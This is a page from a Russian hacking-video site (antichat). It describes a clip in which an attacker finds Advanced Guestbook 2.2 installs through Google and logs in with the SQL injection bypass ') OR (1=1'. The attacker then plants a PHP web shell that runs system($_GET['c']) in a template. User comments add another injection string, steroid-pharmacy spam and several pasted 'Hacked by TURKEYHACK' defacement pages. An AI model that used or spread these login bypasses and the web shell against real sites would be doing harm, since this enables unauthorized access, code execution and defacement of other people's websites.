MAIN PAGE   FORUM   ABOUT US  
 
 
 ANTICHAT.RU
 VIDEO.ANTICHAT.RU
 FORUM
 FAQ
 SEND VIDEO
 INFORMER (ru)
 КОНКУРС (ru)
 
 VIDEO FILES NOT APPROVED
 
Video search

RSS
 
Сategory
SQL INJECTION [61]
XSS [45]
PHP-INJECTION [32]
OTHER [129]
ANTIHACK [11]
VIDEO-WINNER [6]
 
Most active authors
Kez [20]
Zfailure [17]
Zadoxlik [8]
B00zy_c0d3r [6]
Diemad [6]
0x0c0de [5]
Shankar [5]
Nitrex [5]
Micro [5]
Greenbear [5]
(other)
 

 



[11.11.2004. 00:00:00] 1.37Mb
Author: ZFailure
In this video clip, our Hacker had a goal to execute a deface on a site using a famous
vulnerability in an also very famous Guest book, Advanced Guestbook 2.2.
In an instance he opens a browser and Google vomits out a few thousands
of potentially vulnerable victims.
Not on all servers will there be a permission to write anything we want
onto files, but to our Hero, this specific situation is most interesting.
Without any effort having found the needed server and not going out of
frames of courtesy, our Hacker injects instead of a lawful admins password,
a few simple magical combinations:
) OR (1=1
and finds himself inside an Administrators Panel.
Not delaying a single minute, having edited a Template and input a simple script
if(!empty($_GET['c'])) {
echo '
';
system($_GET['c]);
echo '
';
exit;
}
screenshot
DOWNLOAD
There are 3940 downloads already


Comments

add comment




' or 1=1 /*   (19.08.2008. 01:24:04)
hgdkiylkejkirko

Ali Memon   (29.04.2008. 19:36:02)
Dear Sir,



We are pleased to introduce to you our company “blesspharmacy.com”



We are wholesaler & exporter of anabolic steroids, medicine & other pharmaceutical products from Pakistan. The prices of medicines are very competitive in Pakistan, the packing, the presentation and quality conforms to international standard.



Some of our most selling products are Sustanon 250 mg. Organon, Deca Durabolin 100 mg, Testoviron Depot 250 mg. Schering, Testosterone Enanthate, Proviron & Clomid from Pakistan.



Please visit our website www.blesspharmacy.com. On receiving your specific inquiry for the products from our list or any other item; we shall revert to you with our competitive quotes.



We look forward to hearing from you positively.



Thanking you, yours sincerely,



Ali Memon - Export Manager



Bless Pharmacy

Zeenat Medicine Market,

M.A. Jinnah Road,

Karachi,

Pakistan

Tel: 009221-7820033

Fax: 009221-7823331

Mobile: 0092321-3409549

E-mail: contact@blesspharmacy.com

Website: www.blesspharmacy.com


zpy   (14.02.2008. 05:34:35)
nice.........

nizar   (26.07.2007. 13:39:21)
'Advanced Guestbook 2.2'

turkeyhack   (28.04.2007. 21:34:59)
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<!-- saved from url=(0031)http://www.tr-master.net/b.html -->

<HTML><HEAD><TITLE>HacKeD By TURKEYHACK</TITLE>
<script language=JavaScript>
<!--

function SymError()
{
return true;
}

window.onerror = SymError;

//-->
</SCRIPT>

<META http-equiv=Content-Language content=pt-br>
<META http-equiv=Content-Type content="text/html; charset=windows-1254">
<META content="MSHTML 6.00.2800.1106" name=GENERATOR>
<META content=FrontPage.Editor.Document name=ProgId>
<STYLE fprolloverstyle>A:hover {
FONT-WEIGHT: bold; COLOR: #ff0000
}
</STYLE>

<script language=javascript>
<!--
function Is() {
var agent = navigator.userAgent.toLowerCase();
this.major = parseInt(navigator.appVersion);
this.minor = parseFloat(navigator.appVersion);
this.ns = ((agent.indexOf('mozilla')!=-1) && ((agent.indexOf('spoofer')==-1) && (agent.indexOf('compatible') == -1)));
this.ns2 = (this.ns && (this.major == 2));
this.ns3 = (this.ns && (this.major == 3));
this.ns4b = (this.ns && (this.major == 4) && (this.minor <= 4.03));
this.ns4 = (this.ns && (this.major >= 4));
this.ie = (agent.indexOf("msie") != -1);
this.ie3 = (this.ie && (this.major == 2));
this.ie4 = (this.ie && (this.major >= 4));
this.op3 = (agent.indexOf("opera") != -1);
}

var is = new Is()
if(is.ns4) {
doc = "document";
sty = "";
htm = ".document"

} else if(is.ie4) {
doc = "document.all";
sty = ".style";
htm = ""
}

var text1 = "", text2 = "", count = 0, count2=0;
msg = new Array();
msg[0] = "<font face=Courier New size=20><h1><center><u>HackeD By TURKEYHACK</u> </center></h1> ";
msg[1] = " <b>Hacked <font face=Tahoma color=#ff0000><b></font><font face=Tahoma color=#FF0000><b>By TURKEYHACK</font>";
msg[2] = " <b>MaTRaX TeaM </b>";
msg[2] = " I'm turkish <font face=Tahoma color=#FFFFFF><b>HACKER </font><font face=Arial size=2 color=#FF0000> .........</font> ";
msg[3] = " This website HACKED BY TURKEYHACK!!! ";
msg[4] = "<h1>!!! Hacker&#305;m diye ge&#231;inenlere ders olmas&#305; dile&#287;iyle... !!!</h1> <br>";
msg[5] = "<h1> TURKEYHACK </h1> <br>";



text = msg[0].split("");
function writetext(){
text1 ='<tt>'+text2 + '<b style="color:#00FF00">'+text[count]+'</b></tt>';
text2 += text[count];
fillHTML = eval(doc + '["nothing"]' + htm);
if(is.ns4) {
fillHTML.write(text1);
fillHTML.close();
} else {
fillHTML.innerHTML = text1;
}

if (!(count >= text.length-1)){
count+=1;
setTimeout('writetext()',1);
}

else{
count=0;
text2+='<p>'
if (count2!=6){
count2++
text = eval('msg['+count2+'].split("")');
setTimeout('writetext()',5);

}
}
}
<!-- MadrOx -->
//-->
</SCRIPT>
</HEAD>
<BODY text=#00ff00 vLink=#ff0000 aLink=#00ffff link=#ffff00 bgColor=#000000
onload=writetext();>
<DIV align=center>
<CENTER>
<TABLE height=228 width=650 border=0>
<TBODY>
<TR>
<TD align=left width=767 height=224>
<DIV id=nothing style="WIDTH: 807px; HEIGHT: 348px"></DIV>
<P></P>
<P></P></TD></TR></TBODY></TABLE></CENTER></DIV>
<P align=center></P>
<script language=JavaScript1.2>
var COLOR = 999999
var woot = 0
function stoploop() {
document.bgColor = '#000000';
clearTimeout(loopID);
}
function loopBackground() {
if (COLOR > 0) {
document.bgColor = '#' + COLOR
COLOR -= 111111
loopID = setTimeout("loopBackground()",1)
} else {
document.bgColor = '#000000'
woot += 10
COLOR = 999999
COLOR -= woot
loopID = setTimeout("loopBackground()",1)
}
}
//onClick="stoploop()"
function shake(n) {
if (self.moveBy) {
for (i = 10; i > 0; i--) {
for (j = n; j > 0; j--) {
self.moveBy(0,i);
self.moveBy(i,0);
self.moveBy(0,-i);
self.moveBy(-i,0);
}
}
}
setTimeout("shake(1)",10000);
setTimeout("stoploop()",15000);
}
// End -->
</SCRIPT>


<P></P></BODY></HTML>
<TD height="1">
</HEAD>
<BODY><BR>
<CENTER><FONT class=content><A href=""></A> <BR><EMBED
src=http://matrax_team.sitemynet.com/matrax.midi.mp3
hidden=true type=audio/midi
LOOP="TRUE" AUTOSTART="TRUE"><BR><A href="
src="images/ekmek/kalkan.jpg" width=88 border=0></A> <BR><BR><A
href=
border=0></A></FONT></CENTER><BR></BODY></HTML></TD></TR></TBODY></TABLE></TD></TR>
<TR><TR>
<TD height="1">
</HEAD>

















<script language="javascript" src="/mynet_sistem/hostingad.js"></script><script language="javascript" src="Linklerin G&#246;r&#252;lmesine &#304;zin Verilmiyor
Linki G&#246;rebilmek &#304;&#231;in &#220;ye Ol veya Giri&#351; Yap"></script>












<html>

<head>
<meta http-equiv="Content-Language" content="tr">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1254">
<meta name="GENERATOR" content="Microsoft FrontPage 5.0">
<meta name="ProgId" content="FrontPage.Editor.Document">
<meta name="Microsoft Theme" content="none">
</head>

<body bgcolor="#000000"></body>

</html>
<script language="JavaScript">
if (document.all){
Cols=7;
Cl=24; //Pe&#351;pe&#351;e geli&#351; mesafeleri!
Cs=120; //Sayfaya enine yay&#305;l&#305;&#351; mesafeleri!
Ts=10; //Rakamlar&#305;n b&#252;y&#252;kl&#252;kleri!
Tc='#008800';//Renk
Tc1='#00ff00';//Renk1
MnS=22; //Ak&#305;&#351; h&#305;zlar&#305;!
MxS=25; //Ak&#305;&#351; h&#305;zlar&#305;!
I=Cs;
Sp=new Array();S=new Array();Y=new Array();
C=new Array();M=new Array();B=new Array();
RC=new Array();E=new Array();Tcc=new Array(0,1,7,9,3,2);
document.write("<div id='Container' style='position:absolute;top:0;left:-"+Cs+"'>");
document.write("<div style='position:relative'>");
for(i=0; i < Cols; i++){
S=I+=Cs;
document.write("<div id='A' style='position:absolute;top:0;font-family:Arial;font-size:"
+Ts+"px;left:"+S+";width:"+Ts+"px;height:0px;color:"+Tc+";visibility:hidden'></div>");
}
document.write("</div></div>");

for(j=0; j < Cols; j++){
RC[j]=1+Math.round(Math.random()*Cl);
Y[j]=0;
Sp[j]=Math.round(MnS+Math.random()*MxS);
for(i=0; i < RC[j]; i++){
B='';
C=Math.round(Math.random()*1)+' ';
M[j]=B[0]+=C;
}
}
function Cycle(){
Container.style.top=window.document.body.scrollTop;
for (i=0; i < Cols; i++){
var r = Math.floor(Math.random()*Tcc.length);
E = '<font color='+Tc1+'>'+Tcc[r]+'</font>';
Y+=Sp;

if (Y > window.document.body.clientHeight){
for(i2=0; i2 < Cols; i2++){
RC[i2]=1+Math.round(Math.random()*Cl);
for(i3=0; i3 < RC[i2]; i3++){
B[i3]='';
C[i3]=Math.round(Math.random()*1)+' ';
C[Math.floor(Math.random()*i2)]=' '+' ';
M=B[0]+=C[i3];
Y=-Ts*M.length/1.5;
A.style.visibility='visible';
}
Sp=Math.round(MnS+Math.random()*MxS);
}
}
A.style.top=Y;
A.innerHTML=M+' '+E+' ';
}
setTimeout('Cycle()',20)
}
Cycle();
}
</script>
</html>
<!DOCTYPE HTML PUBLIC -//W3C//DTD HTML 4.0 Transitional//tr'>
<title>..:Hacked bY ChayLucK:..</title>
<meta http-equiv='Content-Language' content='pt-br'>
<meta http-equiv='Content-Type' content='text/html; charset=windows-1254'>
<meta name='GENERATOR' content='Microsoft FrontPage 6.0'>
<body bgcolor=black link='lime' vlink='lime' alink='lime' text='#000000'>
<body oncontextmenu='return false'>
<center>
<br>
&nbsp;<script language="JavaScript">

<!--
var current = 0
var x = 0
var y = 0
var speed = 100
var speed2 = 2000

function initArray(n) {
this.length = n;
for (var i =1; i <= n; i++) {
this = ' '
}
}


typ = new initArray(4)
typ[0]=" ..::Hacked by TURKEYHACK::.. "
typ[1]="..::Hacked by TURKEYHACK::.. "
typ[2]="..::Hacked by TURKEYHACK::.. "
typ[3]="...Hacked by TURKEYHACK..."

function typnslide() {
var m = typ[current]

window.status = m.substring(0, x++)

if (x == m.length + 1) {
x = 0

setTimeout("typnslide2()", speed2)
}

else {
setTimeout("typnslide()", speed)
}
}

function typnslide2() {
var m = typ[current]

window.status = m.substring(m.length, y++)

if (y == m.length) {
y = 0
current++

if (current > typ.length - 1) {
current = 0
}
setTimeout("typnslide()", speed)
}

else{
setTimeout("typnslide2()", speed)
}
}

typnslide();
//-->
</script></center>
</html>
</noscript>

<embed name="RAOCXplayer" src="http://www.discoverturkey.com/muzik/istiklal_marsi.mp3" type="application/x-mplayer2" ShowStatusBar="0" AutoSize="true" DisplaySize="0" AutoStart="true" width="128" height="128"></embed></p>
</body>


<a href="http://imageshack.us"><img src="http://img528.imageshack.us/img528/7195/avatar223366ze0.jpg" border="0" alt="Image Hosted by ImageShack.us" /></a>







 

 © ANTICHAT.RU